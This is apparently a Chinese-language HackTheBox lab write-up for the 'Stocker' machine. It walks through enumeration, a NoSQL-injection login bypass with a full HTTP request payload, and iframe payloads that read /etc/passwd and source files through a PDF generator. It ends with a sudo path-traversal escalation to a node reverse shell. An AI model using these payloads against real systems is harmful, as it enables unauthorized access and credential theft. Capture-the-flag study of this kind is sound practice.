HackTheBox Stocker API滥用,CVE-2020-24815获取用户shell,目录遍历提权
靶机地址:
https://app.hackthebox.com/machines/Stocker
枚举
使用nmap枚举靶机
nmap -sC -sV 10.10.11.196
机子开放了22,80端口,我们本地解析一下这个域名
echo "10.10.11.196 stocker.htb" >> /etc/hosts
去浏览器访问这个网站
发现只是一个单一的网页,并没有其他的功能,插件也很少
现在扫一下目录和子域名,但是目录并没有扫到什么有用的东西
但是扫描到一个子域名
./gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u stocker.htb
本地dns解析后去访问这个子域名
echo "10.10.11.196 dev.stocker.htb" >> /etc/hosts
CVE-2020-24815获取用户shell
这是一个登录页面
多半是用nodejs写的
然后我扫描了一下目录,没有什么可以利用的东西
看了就是要想办法去突破这个登录页面了,网站是nodejs写的,然后我去Google上搜索了一下关于nodejssql注入的内容,然后发现了这篇文章
https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass
我们可以尝试绕过这个登录页面,启动burp,然后抓登录包
需要把Content-Type标头改为json数据,然后在下面输入payload
POST /login HTTP/1.1
Host: dev.stocker.htb
Content-Length: 19
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dev.stocker.htb
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://dev.stocker.htb/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A0B2QllbQJO8s_zE5apJUSgndnyzmdVi3.USjl%2BHhDYbne%2BUwk2861GQIHQ84D5cK%2FIgJhJl%2Bo5sY
Connection: close
{"username": {"$ne": null}, "password": {"$ne": null} }
成功登录,我们这是一个购物网站,现在买一个东西看看有没有突破点
提交订单后它会生成一个pdf文件
到这里我测试了很多东西,这个购物网站的功能很少,页面也很少,sql,rce,什么的都测试了一下,还是不行,我会看burp的http历史的时候发现了一个api请求
这是我们提交商品的时候请求的信息,之后就会生成一个pdf文件,我尝试修改了一下title标签,发现生成的pdf文件对应的地方也会变
这里我想到了很多种漏洞的利用,我把pdf下载下来然后用exiftools工具分析后发现了突破点
https://techkranti.com/ssrf-aws-metadata-leakage/
https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file
它存在ssrf漏洞,可以通过一些特定的方式来读取本地上的文件
现在我们尝试读取一下靶机上的/etc/passwd文件
<iframe src=file:///etc/passwd height=1050px width=800px</iframe>
成功利用了,现在我们读取一下nginx的默认配置
<iframe src=file:///etc/nginx/nginx.conf height=1050px width=800px</iframe>
这个网站的源代码在/var/www/dev目录下,我们读取一些配置文件看看能不能找到什么有用的东西
<iframe src=file:var/www/dev/index.js height=1050px width=800px</iframe>
通过前面读取/etc/passwd,发现这个机子上有两个普通用户,一个是mongodb,一个是angoose,我们读取了配置文件,发现了一个疑似密码的字符串
但是mongodb用户无法用这个密码登录上,angoose可以
目录遍历提权
在日常查看用户能用sudo命令运行什么工具时,发现了突破点
我们可以用sudo命令运行node工具,执行在/usr/loacl/scripts目录下的文件,但是我们可以用目录遍历来绕过这个限制
我们在这个网站上生成一个nodejs的rev shellcode
https://www.revshells.com/
然后在当前目录下创建一个.js文件,将这些代码粘贴进去即可
touch baimao.js
nc监听端口
回到靶机执行命令
sudo node /usr/local/scripts/../../../home/angoose/baimao.js
